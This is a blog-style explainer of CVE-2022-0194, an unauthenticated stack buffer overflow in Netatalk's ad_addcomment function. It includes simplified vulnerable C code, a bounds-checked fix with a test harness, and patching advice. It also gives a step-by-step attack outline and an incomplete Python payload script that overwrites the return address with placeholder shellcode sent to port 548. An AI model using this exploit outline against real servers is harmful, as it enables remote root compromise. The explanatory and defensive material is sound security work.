CVE-2022-0194 - How a Simple Buffer Overflow in Netatalk's ad_addcomment Can Lead to Remote Root Code Execution
_CVE-2022-0194_ is a security vulnerability that affects Netatalk, a popular open-source implementation of the Apple Filing Protocol. This bug is severe because it lets a remote attacker execute code as root on a vulnerable server—no login or authentication required. In this post, we’ll break down how this bug works, what makes it dangerous, and how an attacker can exploit it, all in plain English.
What is Netatalk and Why Does This Matter?
Netatalk is used by many organizations as a file-sharing solution for Mac clients. It runs with elevated privileges to handle sensitive files, making any serious vulnerability in it a juicy target for attackers.
The Vulnerability: CVE-2022-0194
Disclosed by Zero Day Initiative as ZDI-CAN-15876, this vulnerability is all about a buffer overflow caused by a lack of length validation in the ad_addcomment function.
Where’s the Problem?
Inside the function ad_addcomment, user-supplied data is copied into a fixed-size buffer on the stack without checking if the input actually fits—a classic stack buffer overflow.
Here’s an example of (slightly simplified) vulnerable code based on the advisories:

    #include <string.h>

    void ad_addcomment(char *comment) {
        char buffer[256];           /* fixed-size stack buffer */
        /* DOES NOT CHECK LENGTH: strcpy copies until it finds a NUL,
         * however far past the end of buffer that takes it */
        strcpy(buffer, comment);
        /* ... other code follows */
    }
If the comment argument is longer than 256 bytes, the data spills over the buffer, corrupting the stack. By crafting this data carefully, an attacker can overwrite the return address or other control data, letting them run any code they want as root.
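The fix for this class of bug is to refuse any comment that cannot fit in the destination, NUL terminator included, before a single byte is copied. The block below is an added example, not Netatalk's code or the project's actual patch: it rewrites the page's simplified ad_addcomment with a bounded length check and a small harness that feeds it constructed comments of different sizes. The 256-byte buffer comes from the post; the function name ad_addcomment_checked, the 0/-1 return codes and the choice to reject (rather than truncate) an over-long comment are assumptions for illustration.

```c
/* Added example (not Netatalk's code): a bounds-checked rewrite of the
 * page's simplified ad_addcomment, plus a harness to exercise it.
 * The buffer size (256) is from the post; the function name, the
 * reject-on-overflow policy and the return codes are assumptions. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define COMMENT_BUF 256 /* matches the fixed-size stack buffer in the post */

/* Hardened variant: copy `comment` into `out` only if it fits, NUL included.
 * Returns 0 on success, -1 if the comment was rejected. */
int ad_addcomment_checked(const char *comment, char *out, size_t outlen)
{
    if (comment == NULL || out == NULL || outlen == 0)
        return -1;

    /* Measure the input but never look further than outlen bytes, so a
     * hostile 400-byte comment is abandoned as soon as it is known not
     * to fit. (Bounded loop instead of strnlen to stay portable C.) */
    size_t n = 0;
    while (n < outlen && comment[n] != '\0')
        n++;
    if (n >= outlen)            /* no room for the terminating NUL */
        return -1;

    memcpy(out, comment, n + 1); /* n bytes of text plus the NUL */
    return 0;
}

/* Harness: build a comment of `len` 'A' bytes (constructed input) and run it
 * through the checked copy into a COMMENT_BUF-sized stack buffer, exactly
 * the layout the vulnerable version used. Returns the copy's result code,
 * or -2/-3 if the harness itself failed. */
int try_comment(size_t len)
{
    char *comment = malloc(len + 1);
    if (comment == NULL)
        return -2;
    memset(comment, 'A', len);
    comment[len] = '\0';

    char buffer[COMMENT_BUF];
    int rc = ad_addcomment_checked(comment, buffer, sizeof buffer);
    free(comment);

    /* On success the copy must be intact and NUL-terminated in the buffer. */
    if (rc == 0 && strlen(buffer) != len)
        return -3;
    return rc;
}

int main(void)
{
    printf("100-byte comment: %d\n", try_comment(100)); /* 0, fits      */
    printf("255-byte comment: %d\n", try_comment(255)); /* 0, fits      */
    printf("256-byte comment: %d\n", try_comment(256)); /* -1, rejected */
    printf("400-byte comment: %d\n", try_comment(400)); /* -1, rejected */
    return 0;
}
```

Note the boundary: a 256-character comment is rejected even though the buffer is 256 bytes, because the terminating NUL needs the 257th byte; the original strcpy would have written it one past the end. Rejecting, rather than silently truncating, keeps the caller from storing a comment that differs from what the client sent.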
No Authentication Barrier
The scary part? There’s no login, handshake, or authentication required. The vulnerable code runs as soon as a network request arrives, before checking who sent it.
Here’s a step-by-step breakdown of one way an attacker could exploit this bug:
1. Identify Vulnerable Servers: Scan the network for exposed Netatalk services (usually port 548/tcp).
2. Send Malicious Data: Craft a request that triggers ad_addcomment, with a string that’s, say, 400 bytes long. The string is shaped so that the extra bytes after 256 overwrite the saved return address with a pointer to attacker-controlled shellcode.
3. Execute Code as Root: When ad_addcomment finishes and tries to return, it jumps to the shellcode instead of going back to harmless program code.
For example:

    import socket

    target_ip = "TARGET_IP"

    payload = b"A" * 256                # Fills up the buffer
    payload += b"\xef\xbe\xad\xde"      # Overwrites saved EBP
    payload += b"\x12\x34\x56\x78"      # Overwrites saved RET address (place shellcode address here)
    payload += b"\x90" * 32             # NOP sled
    payload += b"\xcc" * 100            # Insert your shellcode here

    # The details of sending the payload will depend on the precise protocol Netatalk uses for ad_addcomment
    s = socket.create_connection((target_ip, 548))
    # Send appropriate headers and our payload as the 'comment'
    s.sendall(payload)
    s.close()
See this reference exploit by ZDI for more specifics, since network protocol details are required to construct an actual working exploit.
Original References & Further Reading
- Official CVE Details: CVE-2022-0194
- ZDI Advisory ZDI-22-333
- Netatalk Project Page
- Netatalk Patch Announcement
How to Fix It
1. Update Netatalk to the latest patched version.
2. Or, if you can't update, disable the service or firewall port 548/tcp to prevent access.
TL;DR
CVE-2022-0194 is a buffer overflow bug in Netatalk’s ad_addcomment function. It’s easy to exploit, requires no login, and hands attackers full root control. Make sure your systems are patched now.
Timeline
Published on: 03/28/2023 19:15:00 UTC
Last modified on: 04/03/2023 18:16:00 UTC